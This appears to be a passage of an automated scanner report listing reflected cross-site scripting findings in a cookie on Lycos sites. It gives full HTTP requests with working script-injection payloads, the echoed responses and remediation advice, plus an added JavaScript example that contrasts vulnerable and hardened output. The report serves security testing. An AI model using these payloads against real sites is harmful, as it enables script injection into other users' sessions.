P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-tm.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.360. http://info.lycos.com/tos-tm.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-tm.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b7e6"%3balert(1)//12235f6b35c was submitted in the diktfc cookie. This input was echoed as 3b7e6";alert(1)//12235f6b35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-tm.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6"%3balert(1)//12235f6b35c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-tm.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6";alert(1)//12235f6b35c.lycos.com"
});
</script>
...[SNIP]...

1.361. http://info.lycos.com/tos.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f772"%3balert(1)//8a55a70c6c9 was submitted in the diktfc cookie. This input was echoed as 3f772";alert(1)//8a55a70c6c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772"%3balert(1)//8a55a70c6c9; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772";alert(1)//8a55a70c6c9.lycos.com"
});
</script>
...[SNIP]...

1.362. http://info.lycos.com/tos.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e7"><script>alert(1)</script>527175ce7c7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.363. http://peoplesearch.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53348"><script>alert(1)</script>06140d2ed1c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?tab=people HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.364. http://peoplesearch.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93dbb"%3balert(1)//50c42141ad8 was submitted in the diktfc cookie. This input was echoed as 93dbb";alert(1)//50c42141ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=people HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A93dbb"%3balert(1)//50c42141ad8; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A93dbb";alert(1)//50c42141ad8.lycos.com"
});
</script>
...[SNIP]...

1.365. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd2fc"%3balert(1)//805be358977 was submitted in the diktfc cookie. This input was echoed as fd2fc";alert(1)//805be358977 in the application's response. Note that the response is a 404 page whose body is the same template as the site index (the beacon reports c4 as peoplesearch.lycos.com/index.php), so the reflection does not depend on the requested path existing.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc"%3balert(1)//805be358977; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc";alert(1)//805be358977.lycos.com"
});
</script>
...[SNIP]...

1.366. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77ec"><script>alert(1)</script>002fe144ca0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...
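The two sinks in findings 1.365 and 1.366 (a double-quoted JavaScript string in the COMSCORE.beacon() call, and the src attribute of the scorecardresearch tracker pixel) are reconstructed below with a hardened rendering beside each, as an added example that is not code from this report or from Lycos. The cookie header fragments and payloads are taken from the requests above; the PHP-style URL-decoding of the cookie value, the function names and the beacon markup are assumptions made for the example.

```javascript
// Added example, not code from the XSS.CX report or from Lycos. Sample inputs
// below are copied from the report's requests; names and markup are assumed.

// Cookie headers as submitted by the scanner for 1.365 (script sink) and
// 1.366 (attribute sink), shortened to the relevant cookies.
const COOKIE_SCRIPT_SINK =
  'lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; ' +
  'diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc"%3balert(1)//805be358977; __utmc=1';
const COOKIE_ATTR_SINK =
  'lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; ' +
  'diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0; __utmc=1';

// Extract one cookie and URL-decode it. PHP populates $_COOKIE through
// urldecode, which is why the submitted "%3b" reached the page as ";".
function cookieValue(cookieHeader, name) {
  for (const part of cookieHeader.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1 || part.slice(0, eq).trim() !== name) continue;
    const raw = part.slice(eq + 1).trim();
    try { return decodeURIComponent(raw); } catch (e) { return raw; }
  }
  return null;
}

// Sink 1 (finding 1.365): the value is concatenated into a double-quoted
// JavaScript string, so a quote in the cookie ends the literal.
function renderScriptVulnerable(diktfc) {
  return 'COMSCORE.beacon({ c1:2, c2:6036445, c15:"' + diktfc + '.lycos.com" });';
}

// Hardened: JSON.stringify escapes " and \; the extra replacements cover what
// JSON leaves alone but a <script> block still cares about: < and > (so a
// "</script>" in the data cannot close the block) and the U+2028/U+2029 line
// terminators, which older engines treated as line breaks inside a literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}
function renderScriptHardened(diktfc) {
  return 'COMSCORE.beacon({ c1:2, c2:6036445, c15:' + jsStringLiteral(diktfc + '.lycos.com') + ' });';
}

// Sink 2 (finding 1.366): the same value inside the src attribute of the
// tracker pixel; a quote closes the attribute and the tag that follows is parsed.
function renderImgVulnerable(diktfc) {
  return '<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c15=' +
    diktfc + '.lycos.com&amp;cj=1" alt="tracker" />';
}

// Hardened: the value is a query parameter inside an attribute, so it needs
// two layers in order: percent-encode for the URL, then entity-encode for the
// attribute (that second layer is what turns the query's & into &amp;).
function htmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#39;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function renderImgHardened(diktfc) {
  const query = 'c1=2&c2=6036445&c15=' + encodeURIComponent(diktfc + '.lycos.com') + '&cj=1';
  return '<img src="' + htmlAttr('http://b.scorecardresearch.com/p?' + query) + '" alt="tracker" />';
}

// Breakout checks. Script sink: walk the c15 literal honouring backslash
// escapes; the payload has escaped if anything other than the closing "}"
// follows the literal. Attribute sink: an attribute value cannot contain an
// escaped quote, so the first " after src=" must be followed by the alt attribute.
function scriptBreakout(rendered) {
  const start = rendered.indexOf('c15:"');
  if (start === -1) return false;
  let i = start + 5;
  while (i < rendered.length && rendered[i] !== '"') {
    if (rendered[i] === '\\') i++;
    i++;
  }
  return !rendered.slice(i + 1).trimStart().startsWith('}');
}
function attrBreakout(rendered) {
  const start = rendered.indexOf('src="');
  if (start === -1) return false;
  const end = rendered.indexOf('"', start + 5);
  return !rendered.slice(end + 1).trimStart().startsWith('alt=');
}

// Run both payloads through both renderings and report which ones break out.
function demo() {
  const s = cookieValue(COOKIE_SCRIPT_SINK, 'diktfc');
  const a = cookieValue(COOKIE_ATTR_SINK, 'diktfc');
  return {
    scriptVulnerable: scriptBreakout(renderScriptVulnerable(s)),
    scriptHardened: scriptBreakout(renderScriptHardened(s)),
    attrVulnerable: attrBreakout(renderImgVulnerable(a)),
    attrHardened: attrBreakout(renderImgHardened(a)),
  };
}
console.log(demo());
```

cookieValue() decodes %3b to ; the way the PHP backend evidently did (the request carries %3balert(1) and the response shows ;alert(1)), which is also why the scanner had to encode the semicolon in the first place: a raw ; would have ended the cookie. The breakout checks are deliberately simple string scans rather than a full parser; they are enough to show that the hardened renderings keep the payload inside its literal while the concatenating ones do not.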

1.367. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /frontdoor

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2a6"%3balert(1)//a9d857a500e was submitted in the diktfc cookie. This input was echoed as ef2a6";alert(1)//a9d857a500e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /frontdoor HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aef2a6"%3balert(1)//a9d857a500e; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aef2a6";alert(1)//a9d857a500e.lycos.com"
});
</script>
...[SNIP]...

1.368. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /frontdoor

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af04"><script>alert(1)</script>ad74ead34bd was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /frontdoor HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.369. http://peoplesearch.lycos.com/index.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea545"><script>alert(1)</script>6004c137ca9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
